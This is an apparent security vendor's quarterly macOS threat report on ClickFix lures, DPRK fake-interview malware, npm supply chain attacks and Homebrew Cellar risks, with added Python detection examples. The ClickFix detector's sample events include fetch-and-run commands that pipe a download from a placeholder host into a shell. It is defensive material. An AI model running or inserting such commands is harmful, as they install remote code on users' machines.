The Iru Blog

Iru Quarterly Threat Report: May 2026

Written by Adam Kohler | May 12, 2026 7:24:31 PM

Welcome to the Iru Threat Intelligence Report, our quarterly summary of emerging threats in the macOS ecosystem and how Iru is responding in real time. In each edition, we break down key threat discoveries and the protections we've deployed to keep customer devices secure.

EDR threat detections and responses

Iru EDR is built to detect threats before they go mainstream. By combining behavioral detections with insights from our own malware research, we're able to protect customers from exploitation even before public disclosures or patches become available. This quarter alone, our security researchers curated and shipped 115 new detection rules, meaningfully expanding coverage across the macOS threat landscape. We also released Device Isolation on macOS EDR, giving responders the ability to cut a compromised Mac off from the network in one click while preserving the connection back to Iru for investigation and remediation.

This quarter, three trends dominated the macOS threat landscape, and they're not slowing down. ClickFix social engineering, DPRK fake interview lures, and software supply chain compromises all surged, often borrowing tradecraft from one another. Our researchers were on every one of them.

ClickFix goes mainstream on macOS

Detection: ClickFix, the social engineering trick where users are coached into pasting a malicious command into Terminal, exploded across the macOS ecosystem this quarter. We observed campaigns disguised as fake CAPTCHAs, bogus "reclaim disk space" Apple-themed pages, malvertised ChatGPT and Atlas browser downloads, and typosquatted installer flows targeting crypto wallets. Security Researcher Calvin So published a deep dive on the latest Atomic Stealer (AMOS) wave, including ClickFix delivery, trojanized crypto apps, and a previously undocumented persistence mechanism. Apple shipped a Terminal paste-warning prompt in macOS Tahoe 26.4, and attackers immediately pivoted by abusing Script Editor via URL scheme to sidestep the new control entirely.

Response: ClickFix exploits trust rather than software, which makes behavioral detection essential. Iru EDR flags the parent-child execution chains that define this attack class (Terminal or Script Editor spawning curl, osascript chaining into bash, AppleScript pulling remote payloads) so we catch the activity even when the lure and the payload keep mutating.
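The parent-child chains described above, as an added detection example (not Iru's code): it walks constructed process-start events by pid/ppid and flags a downloader spawned under Terminal or Script Editor, a shell chained from osascript, and an AppleScript that pulls a remote payload. The event field names are assumed.

```python
"""Added example, not Iru's code: flag ClickFix-style execution chains in
constructed process-start telemetry. Field names (pid, ppid, name, cmdline)
are assumed, not any particular EDR's schema."""
from typing import Dict, List

LURE_APPS = {"Terminal", "Script Editor"}   # where the victim pastes the lure
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"bash", "sh", "zsh"}

# Constructed sample events, oldest first; URLs are placeholders.
EVENTS: List[Dict[str, str]] = [
    {"pid": "500", "ppid": "1",   "name": "Terminal",      "cmdline": "Terminal"},
    {"pid": "501", "ppid": "500", "name": "bash",          "cmdline": "bash -c \"curl -fsSL https://example.invalid/i.sh | bash\""},
    {"pid": "502", "ppid": "501", "name": "curl",          "cmdline": "curl -fsSL https://example.invalid/i.sh"},
    {"pid": "600", "ppid": "1",   "name": "Script Editor", "cmdline": "Script Editor"},
    {"pid": "601", "ppid": "600", "name": "osascript",     "cmdline": "osascript -e 'do shell script \"curl -s https://example.invalid/p | sh\"'"},
    {"pid": "602", "ppid": "601", "name": "sh",            "cmdline": "sh -c curl -s https://example.invalid/p | sh"},
    {"pid": "700", "ppid": "500", "name": "git",           "cmdline": "git pull"},  # benign Terminal child
]

def ancestry(pid: str, by_pid: Dict[str, Dict[str, str]]) -> List[str]:
    """Walk ppid links upward; return ancestor process names, nearest first."""
    names, seen = [], set()
    cur = by_pid.get(pid, {}).get("ppid")
    while cur in by_pid and cur not in seen:
        seen.add(cur)
        names.append(by_pid[cur]["name"])
        cur = by_pid[cur]["ppid"]
    return names

def classify(event: Dict[str, str], by_pid: Dict[str, Dict[str, str]]) -> List[str]:
    """Return the ClickFix rule names this process start matches (empty if none)."""
    name, cmd = event["name"], event["cmdline"]
    parents = ancestry(event["pid"], by_pid)
    hits = []
    # Terminal/Script Editor (directly or via a shell) spawning a downloader
    if name in DOWNLOADERS and LURE_APPS & set(parents):
        hits.append("lure-app-spawns-downloader")
    # osascript chaining into a shell
    if name in SHELLS and parents and parents[0] == "osascript":
        hits.append("osascript-chains-shell")
    # AppleScript whose 'do shell script' fetches a remote payload
    if name == "osascript" and "do shell script" in cmd and any(d in cmd for d in DOWNLOADERS):
        hits.append("applescript-pulls-remote-payload")
    return hits

def run(events: List[Dict[str, str]] = EVENTS) -> Dict[str, List[str]]:
    """Map pid -> matched rules for every event that triggers at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: h for e in events if (h := classify(e, by_pid))}

if __name__ == "__main__":
    print(run())
```

The chain is evaluated against ancestors rather than the immediate parent, so a shell inserted between Terminal and curl does not hide the pattern.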

DPRK "Contagious Interview" hits Mac developers

Detection: North Korea's Contagious Interview campaign had a busy quarter. Fake recruiters on LinkedIn continue to lure developers, especially in crypto, AI, and Web3, into "technical assessments" that drop BeaverTail, InvisibleFerret, OtterCookie, and FlexibleFerret onto their Macs. The campaign now spans three delivery channels at once: ClickFix-style "fix your camera driver" prompts during fake video interviews, malicious npm packages handed out as coding challenges, and trojanized Visual Studio Code workspaces with malicious task configurations. Calvin So also documented MonetaStealer, an early-stage, AI-assisted infostealer Iru researchers discovered with zero VirusTotal detections at time of analysis, exactly the kind of low-volume, high-novelty payload these recruiter-driven campaigns lean on.

Response: We're tracking the full BeaverTail / InvisibleFerret / FlexibleFerret family across our customer base, including the Qt-compiled BeaverTail variants and the Apple-Developer-signed FlexibleFerret samples that initially slipped past XProtect. If your developers are hiring, getting hired, or doing take-home coding tests, we have you covered.

The supply chain bites back: Axios, Shai-Hulud, and MiniRAT

Detection: Supply chain compromises came hard and fast this quarter. On March 31, attackers hijacked the maintainer account of axios, an npm package with over 100 million weekly downloads, and published two backdoored versions (1.14.1 and 0.30.4) that pulled in a phantom dependency, plain-crypto-js@4.2.1. The malicious dependency dropped a cross-platform RAT (WAVESHAPER.V2) onto macOS, Windows, and Linux. The operation has been linked to a DPRK-aligned actor, closing the loop between the fake-interview activity above and the supply chain itself. Around the same time, Calvin So analyzed MiniRAT, a Go-based macOS RAT delivered via the malicious velora-dex-sdk npm package, with anti-VM checks, LaunchAgent persistence disguised as an Apple component, and AES-encrypted C2. We also published an investigation into Shai-Hulud, the npm worm that resurfaced in 2026 with new "Third Coming" activity targeting Bitwarden CLI and Checkmarx tooling.

Response: A recurring theme across this quarter's supply chain payloads, including the Axios RAT and MiniRAT, is malware masquerading as legitimate Apple system services, dropping artifacts and persistence under com.apple.* names to blend in with the OS. Iru EDR's behavioral detections flag these impersonation patterns regardless of the specific path or filename, so coverage holds even as the next variant shifts where it lands. More broadly, this incident sits inside a larger 2026 wave: TeamPCP's compromises of Trivy, KICS, LiteLLM, and Telnyx in March, the Bitwarden CLI npm impersonation in April, and the ongoing Shai-Hulud worm activity. Developer endpoints are now part of your attack surface in a very real way, and we treat them like the high-value targets they are.
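The com.apple.* impersonation pattern described above, as an added check (not Iru's code): it parses launchd plists and flags an Apple-looking label that lives outside Apple's own plist directories, launches a program outside system paths, or points at a hidden path. The plist contents and the directory lists are constructed assumptions for the example.

```python
"""Added example, not Iru's code: flag launchd jobs that borrow a com.apple.*
label while living in a user-writable location or launching a non-system
program. Directory/prefix lists are assumptions; plists are constructed."""
import plistlib
from typing import Dict, List

# Where Apple ships its own launchd jobs (assumed, SIP-protected locations).
APPLE_PLIST_DIRS = ("/System/Library/LaunchAgents", "/System/Library/LaunchDaemons",
                    "/Library/Apple/System/Library/")
# Prefixes a genuine Apple job is expected to execute from (assumed).
APPLE_PROGRAM_PREFIXES = ("/System/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/", "/Library/Apple/")

# Constructed sample plists keyed by the path they would sit at on disk.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "/Users/dev/Library/LaunchAgents/com.apple.softwareupdate.plist": plistlib.dumps({
        "Label": "com.apple.softwareupdate",
        "ProgramArguments": ["/Users/dev/Library/Application Support/.cache/helper"],
        "RunAtLoad": True}),
    "/System/Library/LaunchAgents/com.apple.cfprefsd.xpc.agent.plist": plistlib.dumps({
        "Label": "com.apple.cfprefsd.xpc.agent",
        "ProgramArguments": ["/usr/sbin/cfprefsd", "agent"]}),
    "/Users/dev/Library/LaunchAgents/com.example.sync.plist": plistlib.dumps({
        "Label": "com.example.sync",
        "Program": "/Applications/Sync.app/Contents/MacOS/sync"}),
}

def program_of(job: dict) -> str:
    """launchd accepts either Program or ProgramArguments[0] as the executable."""
    return job.get("Program") or (job.get("ProgramArguments") or [""])[0]

def check(path: str, data: bytes) -> List[str]:
    """Return impersonation findings for one plist (empty if nothing suspicious)."""
    job = plistlib.loads(data)
    label = str(job.get("Label", ""))
    findings: List[str] = []
    if not label.startswith("com.apple."):
        return findings                     # only Apple-looking labels are in scope
    if not path.startswith(APPLE_PLIST_DIRS):
        findings.append("apple-label-outside-system-dir")
    prog = program_of(job)
    if not prog.startswith(APPLE_PROGRAM_PREFIXES):
        findings.append("apple-label-runs-nonsystem-program")
    if "/." in prog:                        # hidden directory in the program path
        findings.append("hidden-program-path")
    return findings

def scan(plists: Dict[str, bytes] = SAMPLE_PLISTS) -> Dict[str, List[str]]:
    """Map plist path -> findings for every job that triggers at least one rule."""
    return {p: f for p, d in plists.items() if (f := check(p, d))}
```

Treat "apple-label-outside-system-dir" as a lead rather than a verdict, since a few Apple-installed jobs have historically lived under /Library/LaunchDaemons; the program-path findings are the stronger signal.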

Bonus round: other Iru research this quarter

Detection: Beyond the three big trends, our team kept publishing. Calvin So reverse-engineered a macOS DMG loader masquerading as a music plugin. Principal Security Researcher Csaba Fitzl examined the dangers of cracking tools, including a local privilege escalation vulnerability he uncovered in a popular macOS software cracker. Security Researcher Shwena Kak dug into the security implications of OpenClaw and the new class of autonomous AI agents executing shell commands with deep system access, with very real implications for how attackers will weaponize these tools next.

Response: Threat hunting means understanding where attackers will go next, beyond catching what's already circulating. Whether it's AI-assisted infostealers in early development (MonetaStealer), legitimate dev tools being weaponized (cracking utilities, OpenClaw), or DMG loaders hiding in plain sight, our researchers stay on the leading edge so our detections do too.

Vulnerability management

Iru's vulnerability management work covers both macOS and Windows fleets, and runs on two tracks: original research that ships back upstream to Apple and the broader ecosystem, and detection content that protects customers across the operating systems they actually run. Both were busy this quarter. Iru security researchers added enrichment to 25% of macOS-applicable CVEs and 18.6% of Windows-applicable CVEs this quarter. A blog post coming later this month digs into why this matters, particularly in light of the recent NVD changes to CVE prioritization. We also launched Homebrew detections in vulnerability management!

Vulnerability acknowledgements: six CVEs and three recognitions for Csaba Fitzl

Detection: Principal macOS Security Researcher Csaba Fitzl had a strong showing across this quarter's Apple security releases. Six CVEs were credited to Csaba across macOS Tahoe 26.3, macOS Tahoe 26.4, macOS Sonoma 14.8.4, and the corresponding iOS, iPadOS, tvOS, and visionOS releases, including CoreServices root privilege escalation (CVE-2026-20617 and CVE-2026-20615), a sandbox escape (CVE-2026-28827), and a privacy issue, where an attacker could steal protected iCloud documents (CVE-2026-28881). Three additional Apple acknowledgements without CVE assignment rounded out the quarter, covering Captive Network and other components.

Additionally, Csaba was credited in Carbon Copy Cloner 7.1.5 for a privacy bypass issue.

Response: When our researchers find vulnerabilities upstream, our customers benefit downstream. Every Apple bug Csaba files is a class of attack we already understand from the inside, which means our detections are tuned for the techniques attackers will reach for next, ahead of what's already in the wild.

The hidden risks of the Homebrew Cellar

Detection: We published an in-depth look at the hidden risks of the Homebrew Cellar, the directory where Homebrew stores every version of every package it has ever installed. For most fleets, the Cellar is a long tail of forgotten older versions sitting alongside the current one, versions Homebrew won't update and standard vulnerability scanners often miss entirely. The result is a meaningful blind spot: a Mac can show as "patched" while still carrying exploitable older binaries on disk, fully executable, fully ignored.

Response: Homebrew is everywhere on developer Macs, and the Cellar is a real coverage gap worth taking seriously. Closing it matters.
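The long tail of older Cellar versions described above, as an added check (not Iru's code): it walks a Cellar tree laid out as <cellar>/<formula>/<version>/, orders the versions the way Homebrew names them (dotted version plus an optional _N revision), and reports every version that is no longer the newest one on disk. The sample tree is constructed in a temporary directory.

```python
"""Added example, not Iru's code: list formulas in a Homebrew Cellar that still
carry superseded versions. Assumes the standard <cellar>/<formula>/<version>/
layout; the sample Cellar below is constructed in a temp directory."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

def version_key(v: str) -> Tuple:
    """Sort key for Homebrew versions such as 3.12.4_1 (dotted parts, then revision).
    Each part is tagged (0, int) or (1, str) so mixed parts still compare."""
    base, _, rev = v.partition("_")
    parts = tuple((0, int(p)) if p.isdigit() else (1, p) for p in re.split(r"[.\-]", base))
    return (parts, int(rev) if rev.isdigit() else 0)

def stale_versions(cellar: Path) -> Dict[str, List[str]]:
    """Map formula -> versions on disk older than the newest installed one."""
    stale: Dict[str, List[str]] = {}
    for formula in sorted(p for p in cellar.iterdir() if p.is_dir()):
        versions = sorted((v.name for v in formula.iterdir() if v.is_dir()), key=version_key)
        if len(versions) > 1:
            stale[formula.name] = versions[:-1]   # everything but the newest
    return stale

def demo() -> Dict[str, List[str]]:
    """Build a constructed Cellar tree and run the check on it."""
    layout = {
        "openssl@3":   ["3.1.4", "3.2.1", "3.3.2"],
        "python@3.12": ["3.12.2", "3.12.4_1"],
        "jq":          ["1.7.1"],                       # single version: not stale
        "node":        ["20.11.1", "22.3.0", "21.7.3"],  # deliberately unordered
    }
    with tempfile.TemporaryDirectory() as tmp:
        cellar = Path(tmp)
        for formula, versions in layout.items():
            for v in versions:
                (cellar / formula / v / "bin").mkdir(parents=True)
        return stale_versions(cellar)

if __name__ == "__main__":
    for formula, old in demo().items():
        print(f"{formula}: stale {', '.join(old)}")
```

On a real Mac, point stale_versions at /opt/homebrew/Cellar (Apple silicon) or /usr/local/Cellar (Intel); `brew cleanup` removes the superseded versions it reports.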

What's coming up

The biggest news on the horizon: Windows EDR is coming. We're expanding to Windows fleets, so stay tuned to our blog as our coverage expands to Windows threats as well. We also have speaking engagements coming up for some of our researchers.

  • Calvin So at MacDevOpsYvr26, June 25th-26th: "What's going on with my Mac Malware?"